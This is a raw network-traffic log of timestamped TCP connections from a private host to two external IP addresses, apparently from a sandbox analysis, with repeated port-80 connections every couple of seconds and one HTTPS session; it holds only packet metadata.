Nov 30, 2024 11:12:48.544383049 CET	80	49747	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:48.544488907 CET	49747	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:48.544488907 CET	49747	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:48.546755075 CET	49748	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:48.664453983 CET	80	49747	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:48.666644096 CET	80	49748	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:48.666712999 CET	49748	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:48.667563915 CET	49748	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:48.667592049 CET	49748	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:48.787628889 CET	80	49748	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:48.787643909 CET	80	49748	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:50.425718069 CET	80	49748	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:50.425745964 CET	80	49748	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:50.425796986 CET	49748	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:50.425940990 CET	49748	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:50.428491116 CET	49749	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:50.545840025 CET	80	49748	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:50.548418045 CET	80	49749	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:50.548593044 CET	49749	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:50.548768997 CET	49749	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:50.548789024 CET	49749	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:50.668653965 CET	80	49749	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:50.668756962 CET	80	49749	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:52.340101957 CET	80	49749	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:52.340122938 CET	80	49749	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:52.340198040 CET	49749	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:52.340341091 CET	49749	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:52.342854023 CET	49750	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:52.460235119 CET	80	49749	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:52.462905884 CET	80	49750	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:52.462977886 CET	49750	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:52.463105917 CET	49750	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:52.463133097 CET	49750	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:52.583766937 CET	80	49750	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:52.583868027 CET	80	49750	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:54.211771011 CET	80	49750	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:54.211802006 CET	80	49750	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:54.211867094 CET	49750	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:54.211978912 CET	49750	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:54.215408087 CET	49752	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:54.332532883 CET	80	49750	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:54.336149931 CET	80	49752	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:54.336229086 CET	49752	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:54.339349985 CET	49752	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:54.339375019 CET	49752	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:54.459330082 CET	80	49752	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:54.459343910 CET	80	49752	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:56.079293966 CET	80	49752	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:56.083652020 CET	80	49752	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:56.083759069 CET	49752	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:56.084434986 CET	49752	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:56.086777925 CET	49754	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:56.204425097 CET	80	49752	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:56.206814051 CET	80	49754	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:56.206898928 CET	49754	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:56.207856894 CET	49754	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:56.207885027 CET	49754	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:56.328816891 CET	80	49754	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:56.328835011 CET	80	49754	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:57.958450079 CET	80	49754	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:57.964160919 CET	80	49754	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:57.964234114 CET	49754	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:57.964301109 CET	49754	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:57.966617107 CET	49755	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:58.084218025 CET	80	49754	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:58.086549997 CET	80	49755	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:58.086636066 CET	49755	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:58.086781979 CET	49755	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:58.086811066 CET	49755	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:58.206857920 CET	80	49755	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:58.206990004 CET	80	49755	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:59.830614090 CET	80	49755	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:59.830696106 CET	80	49755	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:59.830749035 CET	49755	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:59.830873013 CET	49755	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:59.833554983 CET	49761	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:59.950865030 CET	80	49755	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:59.953535080 CET	80	49761	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:59.953635931 CET	49761	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:59.953778028 CET	49761	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:59.953802109 CET	49761	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:00.073817968 CET	80	49761	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:00.073831081 CET	80	49761	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:01.802746058 CET	80	49761	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:01.802768946 CET	80	49761	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:01.802937984 CET	49761	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:01.803212881 CET	49761	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:01.805500031 CET	49767	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:01.923430920 CET	80	49761	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:01.925647974 CET	80	49767	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:01.925818920 CET	49767	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:01.925877094 CET	49767	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:01.925900936 CET	49767	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:02.045850992 CET	80	49767	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:02.045876980 CET	80	49767	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:03.676213026 CET	80	49767	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:03.676316023 CET	80	49767	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:03.676362991 CET	49767	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:03.676420927 CET	49767	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:03.679007053 CET	49773	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:03.796830893 CET	80	49767	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:03.799277067 CET	80	49773	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:03.799349070 CET	49773	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:03.799493074 CET	49773	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:03.799519062 CET	49773	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:03.919440031 CET	80	49773	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:03.919512033 CET	80	49773	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:05.639331102 CET	80	49773	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:05.644725084 CET	80	49773	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:05.644767046 CET	49773	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:05.644813061 CET	49773	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:05.647500992 CET	49778	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:05.764673948 CET	80	49773	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:05.767364025 CET	80	49778	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:05.767432928 CET	49778	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:05.767579079 CET	49778	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:05.767607927 CET	49778	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:05.887546062 CET	80	49778	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:05.887691975 CET	80	49778	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:07.570679903 CET	80	49778	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:07.570805073 CET	80	49778	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:07.570894003 CET	49778	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:07.571094036 CET	49778	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:07.573508978 CET	49780	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:07.690982103 CET	80	49778	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:07.693438053 CET	80	49780	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:07.693505049 CET	49780	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:07.693670988 CET	49780	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:07.693706036 CET	49780	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:07.813981056 CET	80	49780	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:07.813993931 CET	80	49780	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:09.507329941 CET	80	49780	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:09.507489920 CET	80	49780	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:09.507540941 CET	49780	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:09.507682085 CET	49780	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:09.627659082 CET	80	49780	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:10.656449080 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:10.656478882 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:10.656543970 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:10.656896114 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:10.656909943 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:12.097831011 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:12.097930908 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:12.104140997 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:12.104152918 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:12.104409933 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:12.122706890 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:12.167330027 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:12.622001886 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:12.622026920 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:12.622185946 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:12.622204065 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:12.663271904 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:12.832181931 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:12.832191944 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:12.832268953 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:12.853069067 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:12.853076935 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:12.853133917 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:12.878456116 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:12.878463984 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:12.878561020 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:12.899914026 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:12.899980068 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:13.042807102 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:13.042902946 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:13.055180073 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:13.055345058 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:13.070139885 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:13.070305109 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:13.084928036 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:13.085100889 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:13.098143101 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:13.098221064 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:13.108097076 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:13.108275890 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:13.118201971 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:13.118272066 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:13.128158092 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:13.128261089 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:13.253307104 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:13.253633022 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:13.261033058 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:13.261112928 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:13.270540953 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:13.270622015 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:13.280006886 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:13.280081987 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:13.292457104 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:13.292515993 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:13.297405005 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:13.297470093 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:13.302448988 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:13.302522898 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:13.307471037 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:13.307552099 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:13.314027071 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:13.314122915 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:13.319175959 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:13.319255114 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:13.320849895 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:13.320899963 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:13.320950031 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:13.320980072 CET	49791	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:13.320992947 CET	443	49791	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:13.341000080 CET	49797	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:13.461041927 CET	80	49797	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:13.461112022 CET	49797	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:13.461258888 CET	49797	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:13.461287975 CET	49797	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:13.581319094 CET	80	49797	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:13.581343889 CET	80	49797	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:15.257535934 CET	80	49797	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:15.257600069 CET	80	49797	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:15.257747889 CET	49797	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:15.262013912 CET	49797	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:15.270701885 CET	49803	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:15.381953955 CET	80	49797	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:15.390645027 CET	80	49803	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:15.390754938 CET	49803	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:15.396183014 CET	49803	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:15.396204948 CET	49803	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:15.516215086 CET	80	49803	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:15.516267061 CET	80	49803	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:17.454736948 CET	80	49803	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:17.454768896 CET	80	49803	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:17.454824924 CET	49803	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:17.455091953 CET	49803	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:17.458414078 CET	49809	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:17.574975014 CET	80	49803	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:17.578366041 CET	80	49809	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:17.578476906 CET	49809	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:17.578808069 CET	49809	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:17.578838110 CET	49809	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:17.699543953 CET	80	49809	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:17.699687004 CET	80	49809	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:19.368659019 CET	80	49809	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:19.374459028 CET	80	49809	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:19.374519110 CET	49809	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:19.374558926 CET	49809	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:19.377026081 CET	49815	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:19.494515896 CET	80	49809	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:19.496925116 CET	80	49815	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:19.496989012 CET	49815	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:19.497152090 CET	49815	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:19.497152090 CET	49815	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:19.617201090 CET	80	49815	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:19.617300987 CET	80	49815	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:21.288722992 CET	80	49815	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:21.288827896 CET	80	49815	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:21.288923025 CET	49815	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:21.289062023 CET	49815	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:21.292443991 CET	49819	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:21.410607100 CET	80	49815	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:21.414350986 CET	80	49819	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:21.415646076 CET	49819	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:21.415868998 CET	49819	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:21.415903091 CET	49819	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:21.536211014 CET	80	49819	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:21.536299944 CET	80	49819	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:23.208852053 CET	80	49819	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:23.208998919 CET	80	49819	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:23.209111929 CET	49819	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:23.209139109 CET	49819	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:23.211651087 CET	49823	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:23.329133987 CET	80	49819	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:23.331640005 CET	80	49823	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:23.331847906 CET	49823	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:23.331949949 CET	49823	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:23.331978083 CET	49823	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:23.452244997 CET	80	49823	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:23.452259064 CET	80	49823	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:25.128737926 CET	80	49823	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:25.128890991 CET	80	49823	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:25.128969908 CET	49823	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:25.133466005 CET	49823	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:25.253410101 CET	80	49823	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:25.333441973 CET	49828	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:25.453382969 CET	80	49828	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:25.453447104 CET	49828	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:25.453610897 CET	49828	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:25.453622103 CET	49828	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:25.573756933 CET	80	49828	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:25.573811054 CET	80	49828	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:27.262444973 CET	80	49828	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:27.267971992 CET	80	49828	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:27.270541906 CET	49828	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:27.270606041 CET	49828	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:27.274652004 CET	49834	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:27.390757084 CET	80	49828	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:27.394556999 CET	80	49834	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:27.394622087 CET	49834	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:27.394815922 CET	49834	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:27.394829035 CET	49834	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:27.514995098 CET	80	49834	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:27.515011072 CET	80	49834	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:29.204399109 CET	80	49834	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:29.204462051 CET	80	49834	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:29.204840899 CET	49834	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:29.204891920 CET	49834	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:29.208331108 CET	49840	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:29.325155973 CET	80	49834	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:29.328253984 CET	80	49840	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:29.328340054 CET	49840	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:29.328526020 CET	49840	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:29.328557014 CET	49840	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:29.448401928 CET	80	49840	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:29.448518038 CET	80	49840	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:31.076697111 CET	80	49840	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:31.076710939 CET	80	49840	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:31.076893091 CET	49840	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:31.082050085 CET	49840	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:31.117103100 CET	49842	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:31.202124119 CET	80	49840	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:31.237075090 CET	80	49842	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:31.237195015 CET	49842	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:31.237323999 CET	49842	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:31.237354040 CET	49842	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:31.357218981 CET	80	49842	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:31.357250929 CET	80	49842	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:33.046477079 CET	80	49842	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:33.046586037 CET	80	49842	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:33.046648979 CET	49842	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:33.049777985 CET	49842	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:33.069211006 CET	49847	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:33.169724941 CET	80	49842	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:33.189162016 CET	80	49847	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:33.189308882 CET	49847	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:33.190927982 CET	49847	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:33.191423893 CET	49847	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:33.310832977 CET	80	49847	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:33.311260939 CET	80	49847	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:34.992533922 CET	80	49847	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:34.998097897 CET	80	49847	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:34.998162031 CET	49847	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:34.998189926 CET	49847	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:35.002702951 CET	49853	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:35.118506908 CET	80	49847	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:35.122852087 CET	80	49853	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:35.122921944 CET	49853	80	192.168.2.4	189.163.166.52
